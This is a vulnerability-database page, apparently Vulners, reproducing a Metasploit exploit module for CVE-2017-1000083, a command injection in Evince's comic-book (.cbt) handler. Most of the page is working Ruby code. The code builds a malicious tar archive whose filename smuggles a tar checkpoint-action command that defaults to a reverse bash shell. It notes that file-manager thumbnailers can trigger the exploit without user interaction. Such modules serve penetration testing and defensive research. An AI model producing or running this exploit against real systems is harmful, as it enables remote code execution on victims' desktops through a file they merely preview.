Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Evince - CBT File Command Injection (Metasploit)

🗓️ 11 Feb 2019 00:00:00Reported by MetasploitType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 75 Views

Evince CBT File Command Injection, allows command execution via thumbnail previe

Related
Code
ReporterTitlePublishedViews
Family
FreeBSD		evince and atril -- command injection vulnerability in CBT handler
6 Jul 201700:00
freebsd
0day.today		Evince 3.24.0 - Command Injection Exploit
13 Nov 201800:00
zdt
0day.today		Evince CBT File Command Injection Exploit
7 Feb 201900:00
zdt
ATTACKERKB		CVE-2017-1000083
5 Sep 201700:00
attackerkb
AlpineLinux		CVE-2017-1000083
5 Sep 201706:00
alpinelinux
ArchLinux		[ASA-201707-14] evince: arbitrary command execution
14 Jul 201700:00
archlinux
Tenable Nessus		CentOS 7 : evince (CESA-2017:2388)
25 Aug 201700:00
nessus
Tenable Nessus		Debian DLA-1031-1 : evince security update
19 Jul 201700:00
nessus
Tenable Nessus		Debian DSA-3911-1 : evince - security update
17 Jul 201700:00
nessus
Tenable Nessus		Debian DSA-3916-1 : atril - security update
24 Jul 201700:00
nessus
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'rex/zip'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Evince CBT File Command Injection',
      'Description'    => %q{
        This module exploits a command injection vulnerability in Evince
        before version 3.24.1 when opening comic book `.cbt` files.

        Some file manager software, such as Nautilus and Atril, may allow
        automatic exploitation without user interaction due to thumbnailer
        preview functionality.

        Note that limited space is available for the payload (<256 bytes).
        Reverse Bash and Reverse Netcat payloads should be sufficiently small.

        This module has been tested successfully on evince versions:

        3.4.0-3.1 + nautilus 3.4.2-1+build1 on Kali 1.0.6;
        3.18.2-1ubuntu4.3 + atril 1.12.2-1ubuntu0.3 on Ubuntu 16.04.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Felix Wilhelm',     # Discovery
          'Sebastian Krahmer', # PoC
          'Matlink',           # Exploit
          'bcoles'             # Metasploit
        ],
      'References'     =>
        [
          ['BID', '99597'],
          ['CVE', '2017-1000083'],
          ['EDB', '45824'],
          ['URL', 'https://seclists.org/oss-sec/2017/q3/128'],
          ['URL', 'https://bugzilla.gnome.org/show_bug.cgi?id=784630'],
          ['URL', 'https://bugzilla.suse.com/show_bug.cgi?id=1046856'],
          ['URL', 'https://bugs.launchpad.net/ubuntu/+source/atril/+bug/1735418'],
          ['URL', 'https://bugs.launchpad.net/ubuntu/+source/atril/+bug/1800662'],
          ['URL', 'https://access.redhat.com/security/cve/cve-2017-1000083'],
          ['URL', 'https://security-tracker.debian.org/tracker/CVE-2017-1000083']
        ],
      'Platform'       => 'unix',
      'Arch'           => ARCH_CMD,
      'Payload'        =>
        {
          'Space'       => 215,
          'BadChars'    => "\x00\x0a\x0d\x22",
          'DisableNops' => true
        },
      'DefaultOptions'  =>
        {
          'PAYLOAD' => 'cmd/unix/reverse_bash',
          'DisablePayloadHandler' => true
        },
      'Targets'        => [[ 'Automatic', {}]],
      'Privileged'     => false,
      'DisclosureDate' => '2017-07-13',
      'DefaultTarget'  => 0))
    register_options([
      OptString.new('FILENAME', [true, 'The cbt document file name', 'msf.cbt'])
    ])
  end

  def exploit
    ext = %w[png jpg gif]
    path = " --checkpoint-action=exec=bash -c \"#{payload.encoded};\".#{ext.sample}"

    # Tar archive max path length is 256.
    if path.length > 256
      fail_with Failure::PayloadFailed, "Payload is too large (#{path.length}): Max path length is 256 characters"
    end

    # Tar archive max file name length is 100.
    path.split('/').each do |fname|
      if fname.length > 100
        fail_with Failure::PayloadFailed, "File name too long (#{fname.length}): Max filename length is 100 characters"
      end
    end

    # Create malicious tar archive
    tarfile = StringIO.new
    Rex::Tar::Writer.new tarfile do |tar|
      tar.add_file path, 0644 do |io|
        io.write ''
      end
      # Pad file to 1+ MB to trigger tar checkpoint action
      tar.add_file rand_text_alphanumeric(10..20), 0644 do |io|
        io.write rand_text(1_000_000..1_100_000)
      end
    end
    tarfile.rewind
    cbt = tarfile.read

    print_status "Writing file: #{datastore['FILENAME']} (#{cbt.length} bytes) ..."
    file_create cbt
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
11 Feb 2019 00:00Current
7.7High risk
Vulners AI Score7.7
CVSS 26.8
CVSS 37.8
EPSS0.76136
evincecbt filecommand injectionthumbnailerexploitunixpayloadnautilusatrilcve-2017-1000083file managermetasploitvulnerability
75